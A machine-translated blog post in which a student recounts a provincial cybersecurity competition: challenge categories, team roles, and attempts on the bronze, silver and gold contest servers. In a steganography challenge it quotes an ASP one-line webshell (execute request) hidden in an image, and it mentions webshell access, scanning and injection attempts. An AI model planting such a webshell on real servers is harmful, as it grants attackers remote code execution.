This is also the last time I participated in the provincial competition.
After all, the future competition opportunities will be reserved for children's shoes in lower grades ~
Bytes ---------------------------------------------------------------------------------------------------------------------
Time: May 21 am-pm
Location: CUIT (Chengdu Institute of Information Engineering)
CONTESTANT: (CUIT Team1) blu3boy casperkid hmlttrack (persons in this transcript)
(CUIT Team2) littlefater vccjis xiangshen
39 other high school teams (117)
Because the proportion of penetration questions in the competition is too heavy
Our school team works together (2 penetration direction players + 1 reverse direction players)
Competition introduction:
The computer used for this competition is brought by the contestants themselves.
The topic is provided by lvmeng technology for a total of 200 points
1. Theoretical question 50 points
All are subject to multiple choice questions
Sniffing-Principle
Scan-principles
Cryptographic algorithm-DES Principle
Firewall-concept and Configuration
Reverse Engineering-shelling Application
Buffer overflow-Principle
Denial of Service Attack-Principles of SYN attacks, smurf attacks, pingflood, Teardrop, and LAND attacks
Malicious Code-principles and features of Trojans, viruses, worms, and malicious code on webpages
SQL Injection-Application
Principles of network spoofing-IP Address Spoofing
Log cleanup-Windows, linux
Operating system vulnerabilities-Windows and linux
Operating system security policy configuration-Windows and linux
Network device attack and Security Configuration-routers, switches, etc.
Commonly used doscommands-Ping, nslookup, tracert, etc.
2. Practice Question 50 points
There are 6 types of online key submission questions.
Basic
Web Security
OS
Crack cracking
Overflow
Prog Programming
3. penetration question 100 points
Questions for penetration testing
Bronze server environment:
OS: Windows2003
Web Server: IIS 6.0
DataBase: SQL Server 2000
Web Application: hishop5.1
Silver server environment:
OS: Windows2003
Web Server: Apache 2.x
DataBase: MYSQL
Web Application: Korean XpressEngine
Gold medal server environment:
OS: Debian
Start now
Bytes ---------------------------------------------------------------------------------------------------------------------
= Morning =
(7: 20 am)
Struggling to get up
Then, get ready to start today's battle.
As a result, it was still raining.
Wearing a short sleeve is too cold to bring a coat.
Then get up with hmlttrack and go to the lab together.
Two people have no appetite. They just drank porridge in the canteen.
I received a text message from the melon doll.
(8: 10 am)
Go to the lab to split the cddedevil 2 GB memory.
Then I made my computer 4G = ~
Then I sent the contestant a red dress ......
Then move the computer to the competition venue to test the network.
(9: 00 am)
What are group photos taken before the team sign in?
I met adomore from Chengdu University and went back to the competition venue.
We can see that the allocated CIDR block on our seats is an intranet IP address, and it's cool.
It is estimated that the penetration question will not require a rebound connection.
In this case, the question of penetration will be no intranet penetration.
(During preparations, we also simulated various possible Intranet conditions... TAT ~)
I also found that y32asm is sitting behind me ~
(9: 30 am)
Start the competition
Our division of labor is
I and hmlttrack first make theoretical questions
Make half of each question
Blu3boy's bronze server that directly performs penetration questions
It took about 10 minutes to complete the theoretical questions.
Blu3boy also obtained and granted permissions to webshell.
(Before the competition, I did not know the web program version. I only knew that hisdesk5.x was the result. We also dug hisdesk5.40day)
(I thought we could use the game today to open the gap with other teams. Who knows the lowest version of hisdesk5.1... makes us feel the same)
Then start searching for the key file.
Blu3boy found two key files.
I found the bronze file.
From the very beginning, the game soared to 1st = ......
Then blu3boy started to engage in silver server again
At first glance, it was a bunch of Korean web programs.
I swept the gold medal server and opened 22 and 23
The server was shut down in about five minutes.
(It seems that some teams are focusing on Penetration questions too early, and the organizer wants the team to make a question first)
We only have to focus on practical issues.
Hmlttrack is mainly responsible for reverse/cracking/programming issues
Blu3boy is mainly responsible for SQL Injection issues
I am mainly responsible for web security issues
I don't know what they do. I only remember my own questions ~
Basic Encoding
You can directly perform base64 decryption on the last part of the package.
XSS is more impressive than Coding
Is a utf-7 coding question a look at the heart of the bright
During the winter vacation before I went to the ali interview, I was asked to prepare web security related knowledge.
Master asked me to do a small task to understand utf-7-related technologies
Previous notes summary http://hi.baidu.com/hackercasper/blog/item/7b0a1b8188abe5c49023d97a.html
Right after seeing a callback and utf-7 bom, I knew how to do it.
It's just a utf-7 decoding.
But suddenly remembered that there were no tools at hand
Later I remembered that spark once sent me a tool that he wrote to detect xss. XCapture has the function of utf-7 decoding.
Quick after installation
Information Hiding is also a pain point
Download an image and use winhex to open the last asp sentence.
Content: <% execute request ("hacker") %>
The sha160-hash obtained by sha1 encryption is the key.
This question does not have much practical significance.
Practice is really a pain point
It is different from the topic type listed in the original question outline.
Some types of games in the previous list are not displayed at all.
It's a bit like a guess.
The question of a cat catching a mouse
Listen to Team2's teammate vccjis
Is to see the question path http: // xx/3/catch/contains a catch
So we need to think of capturing packets ......
Various blood spray ...... = ~
This has nothing to do with the security feeling in real life.
I just want to guess the dummies in ancient times ......
Next to the previous article == ~
Bytes ---------------------------------------------------------------------------------------------------------------------
= Noon =
(12: 00 am)
Go to the instructor canteen for dinner at noon
On the road, I will discuss with my teammates how to divide the remaining questions and penetrate into the upcoming silver medal and gold medal server ideas.
The preparations before the competition have always been an assumption that there will be an intranet. As a result, three servers are all public networks, all of which cause various headaches.
Then I said we could sniff the bronze server again.
Because the 22 on the gold medal server is ssh 1.99 (only the 1.x version seems to be capable of sniffing)
Then we also opened 23, which is telnet. This is clearly feasible for sniffing.
After all, although the three servers are all public networks, they may be able to sniff anything in the same c segment.
Soon after eating, I went to the competition venue to start fighting.
(12: 50 am)
Back to the lab, I found that the accounts and webshells of the bronze server were deleted.
It is estimated that other teams are doing bad things.
We only have to take it again.
Then enter the Desktop
Using a self-written arp tool to scan Intranet ip addresses
(Unlike s.exe, which is based on the tcp protocol to scan the port or as if cain is based on winpcap)
Scan and find that the bronze server is isolated.
Not a stepping stone for silver or gold servers
You don't have to worry about it anymore.
Bytes ---------------------------------------------------------------------------------------------------------------------
= Afternoon =
(1: 00 pm)
Silver server and gold server open
Blu3boy is responsible for silver server (windows2003 + php)
I am in charge of golden server (Linux)
First use Awvs to scan the silver server, at least first clear the web path structure first
One of these paths exposes the absolute web path (my mind is still steadfast)
In addition to South Korea's web programs, phpmyadmin is also scanned.
Then I used nmap to scan both the silver medal and gold medal servers.
The silver server also opened 1433 and 8080
8080 is the default html page of IIS.
I couldn't guess the password even after I got the 1433 password.
Later, we asked blu3boy To Try Search injection and wide byte injection at a high speed.
When testing a page, it seems that compound injection with search type + width byte is somewhat responsive.
Then he tried again. Unfortunately, at the end, he didn't try out any more ~
(2: 00 pm)
Hmlttrack's 3rd questions about crack have never been made. The algorithm is too complicated. It takes too much time to do so.
I gave up on other questions.
Blu3boy and I are wasting a lot of time
At last, I had to go back and start my practice.
I did a log forensics question.
The hacker's IP address is found in the log.
Then 3389
But never know the password